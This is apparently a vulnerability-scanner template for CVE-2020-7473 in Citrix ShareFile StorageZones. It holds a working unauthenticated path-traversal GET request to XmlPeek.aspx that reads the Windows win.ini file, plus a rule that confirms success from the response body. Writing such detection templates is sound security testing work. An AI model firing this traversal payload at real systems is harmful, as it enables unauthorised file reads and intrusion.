id: citrix-share-lfi
info:
  name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read - CVE-2020-7473
  risk: Potential
  confidence: Tentative

params:
  - root: "{{.BaseURL}}"

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch('body', 'bit app support') && StringSearch('body', 'extensions')

reference:
  - link: https://support.citrix.com/article/CTX269106
